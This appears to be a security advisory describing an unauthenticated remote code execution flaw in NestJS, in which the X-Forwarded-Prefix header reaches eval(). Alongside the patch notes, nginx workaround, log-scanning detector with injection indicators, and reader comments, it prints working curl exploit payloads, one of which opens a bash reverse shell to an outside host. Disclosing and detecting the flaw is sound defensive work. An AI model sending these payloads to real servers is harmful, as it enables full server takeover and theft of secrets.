Critical Advisory

CVE-2026-27464: Unauthenticated Remote Code Execution in NestJS Core (CVSS 9.8)

James Rutherford
Senior Vulnerability Researcher · sec-advisory.io

CVSS score: 9.8
CVSS vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness: CWE-78, OS Command Injection
Exploitation status: Active Exploitation
Patch: Available (10.4.2)
Active exploitation detected. Shodan scans confirm over 14,000 publicly reachable NestJS instances running vulnerable versions as of March 2, 2026. Patch immediately.

A critical unauthenticated remote code execution vulnerability has been identified in the NestJS framework core, affecting all versions prior to 10.4.2. The vulnerability resides in the HTTP request parsing pipeline and allows an attacker to execute arbitrary operating system commands on the server by sending a specially crafted X-Forwarded-Prefix header; no authentication and no user interaction are required.

Our research team discovered the vulnerability during a routine audit of NestJS internals on February 18, 2026. Coordinated disclosure was made to the NestJS maintainers on February 20, with a patch released on March 1. Public exploitation was observed in the wild within 36 hours of the patch being published, suggesting the vulnerability was independently discovered by threat actors.

Background

NestJS is a progressive Node.js framework built on top of Express or Fastify, used extensively in enterprise backend systems. Its popularity (over 65 million weekly npm downloads) makes vulnerabilities in its core particularly high-impact. The affected component is the router execution context, responsible for resolving and dispatching incoming HTTP requests to the appropriate controller handlers.

Technical Deep Dive

Root Cause

The root cause is an unsafe interpolation of the X-Forwarded-Prefix request header into a template literal that is subsequently passed to eval() within the router resolution layer. This code path is reached for every incoming request when the application is deployed behind a reverse proxy with prefix stripping enabled, a common production configuration.

// @nestjs/core <10.4.2
// packages/core/router/router-execution-context.ts:214

private resolvePrefix(req: Request): string {
  const prefix = req.headers['x-forwarded-prefix'] as string;
  if (!prefix) return '';

  // BUG: unsanitised user-controlled input passed to eval()
  return eval(`resolveRoute("${prefix}")`);
}

Exploitation

An attacker sends a crafted HTTP request with a malicious X-Forwarded-Prefix header. The injected payload breaks out of the template literal string context and executes arbitrary Node.js code with the privileges of the server process:

# Basic RCE: write output to /tmp
curl -sk https://target.com/api/health \
  -H 'X-Forwarded-Prefix: ");const{execSync}=require("child_process");execSync("id>/tmp/pwn");//'

# Reverse shell one-liner
curl -sk https://target.com/api/health \
  -H 'X-Forwarded-Prefix: ");require("child_process").exec("bash -i >& /dev/tcp/10.10.10.1/4444 0>&1");//'

Why eval()?

A code review of the git history reveals this pattern was introduced in commit a3f891c (v9.2.0) as a quick fix for a prefix normalisation edge case. The use of eval() was flagged in an internal comment as "temporary" but was never revisited. The function is reached on every request, making this trivially exploitable against any production deployment behind a reverse proxy.

Impact

Full server compromise: confidentiality, integrity, and availability are all affected. An attacker can read environment variables (including secrets and API keys), modify application data, pivot to internal network resources, or install persistent backdoors.

Disclosure Timeline

  • Feb 18, 2026: Vulnerability discovered during internal audit by sec-advisory research team.
  • Feb 20, 2026: Private disclosure submitted to NestJS security team via security@nestjs.com.
  • Feb 21, 2026: NestJS team acknowledged the report and began patch development.
  • Mar 1, 2026: Patch released: @nestjs/core@10.4.2. CVE-2026-27464 assigned.
  • Mar 2, 2026: Active exploitation observed in the wild. Shodan confirms 14,000+ exposed instances.

Affected Versions

Package                  | Affected Range | Fixed Version | Notes
@nestjs/core             | 9.2.0 – 10.4.1 | 10.4.2        | Primary vector
@nestjs/platform-express | 9.2.0 – 10.4.1 | 10.4.2        | Affected via core
@nestjs/platform-fastify | 9.2.0 – 10.4.1 | 10.4.2        | Affected via core
@nestjs/microservices    | Not affected   | n/a           | No HTTP layer

Remediation

Patch now. Update all @nestjs/* packages to 10.4.2 or later.
npm install @nestjs/core@latest \
             @nestjs/platform-express@latest \
             @nestjs/platform-fastify@latest

If you cannot patch immediately, strip the X-Forwarded-Prefix header at your reverse proxy before it reaches the Node.js process. Example nginx config:

# nginx: strip the header as a temporary workaround
location / {
  proxy_set_header X-Forwarded-Prefix "";
  proxy_pass http://nestjs_upstream;
}
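Stripping the header at the proxy removes the vector going forward; it does not tell you whether anyone tried the payload before the workaround went in. The following is an added example (not part of the advisory and not NestJS code) of a retrospective check over reverse-proxy access logs. It assumes, hypothetically, that the proxy logs one JSON object per request with fields ts, src, method, path and xfp (the raw X-Forwarded-Prefix value); the log lines, the indicator names and the path grammar are all constructed for this example.

```javascript
// Added example, not part of the advisory: scanning reverse-proxy access logs
// for attempts against the X-Forwarded-Prefix vector. Assumes (hypothetically)
// that the proxy logs one JSON object per request with the fields ts, src,
// method, path and xfp. The log lines below are constructed sample data.
const SAMPLE_LOG = [
  '{"ts":"2026-03-02T08:14:03Z","src":"198.51.100.23","method":"GET","path":"/api/health","xfp":"/api"}',
  '{"ts":"2026-03-02T08:14:09Z","src":"203.0.113.77","method":"GET","path":"/api/health","xfp":"\\");require(\\"child_process\\")//"}',
  '{"ts":"2026-03-02T08:14:11Z","src":"203.0.113.78","method":"GET","path":"/api/health","xfp":"//evil.example"}',
  '{"ts":"2026-03-02T08:14:15Z","src":"198.51.100.24","method":"POST","path":"/api/orders"}',
  "malformed line that the collector failed to encode",
];

// A legitimate prefix is a short absolute path made of plain segments
// (assumed grammar; widen it if your deployment uses other characters).
const CLEAN_PREFIX = /^\/(?:[A-Za-z0-9._~-]+(?:\/[A-Za-z0-9._~-]+)*\/?)?$/;

// Substrings that only make sense if the sender is trying to break out of the
// string literal and run code. Each is a named indicator for the report.
const INDICATORS = [
  ["string-breakout", /["')]/],
  ["module-load", /require\s*\(/],
  ["process-spawn", /child_process/],
  ["dynamic-eval", /\beval\s*\(/],
];

// Classify one header value: absent, clean, malformed (outside the grammar but
// no code indicators) or exploit-attempt (one or more indicators matched).
function classifyPrefix(value) {
  if (value === undefined || value === "") return { verdict: "absent", indicators: [] };
  const indicators = INDICATORS.filter(([, re]) => re.test(value)).map(([name]) => name);
  if (indicators.length > 0) return { verdict: "exploit-attempt", indicators };
  if (!CLEAN_PREFIX.test(value)) return { verdict: "malformed", indicators };
  return { verdict: "clean", indicators };
}

// Walk the log, skipping lines that are not valid JSON (counted, not dropped
// silently), and return every request worth a closer look.
function scanLog(lines) {
  const findings = [];
  let unparsed = 0;
  for (const line of lines) {
    let entry;
    try {
      entry = JSON.parse(line);
    } catch {
      unparsed += 1;
      continue;
    }
    const { verdict, indicators } = classifyPrefix(entry.xfp);
    if (verdict === "exploit-attempt" || verdict === "malformed") {
      findings.push({ ts: entry.ts, src: entry.src, path: entry.path, verdict, indicators });
    }
  }
  return { findings, unparsed };
}

// Stand-alone run over the constructed sample.
const report = scanLog(SAMPLE_LOG);
for (const f of report.findings) {
  console.log(`${f.ts} ${f.src} ${f.verdict} ${f.path} [${f.indicators.join(", ")}]`);
}
console.log(`${report.unparsed} line(s) could not be parsed`);
```

Two verdicts are reported on purpose: "exploit-attempt" is a high-confidence hit on the code-injection shape, while "malformed" catches values that no proxy would legitimately send and is worth a look even when it matches no known payload. Whether "malformed" is treated as an alert or just a metric is a tuning decision for the environment.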

Credits

Discovered and reported by James Rutherford and Aisha Okonkwo of the sec-advisory.io research team. Coordinated with the NestJS security team who responded promptly and professionally.

Comments (8)

dev_kira 2 hours ago
Patched our fleet within the hour. Thanks for the detailed write-up. The nginx workaround saved us while we were waiting for our CI pipeline to finish.

m_nwosu 3 hours ago
36 hours from patch to active exploitation in the wild is terrifying. This is why organisations need automated dependency update pipelines.

sec_vanguard 5 hours ago
Can confirm we caught an exploitation attempt in our WAF logs about 4 hours ago. The payload matched the PoC exactly. Updated immediately.

t_haugen 6 hours ago
The "temporary" comment in the git history that stayed for 4 major versions is a classic. Technical debt really does kill.